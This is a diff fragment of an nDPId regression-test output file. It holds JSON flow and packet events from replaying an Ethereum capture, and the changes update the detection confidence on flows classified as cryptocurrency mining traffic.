00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -298,19 +298,19 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} 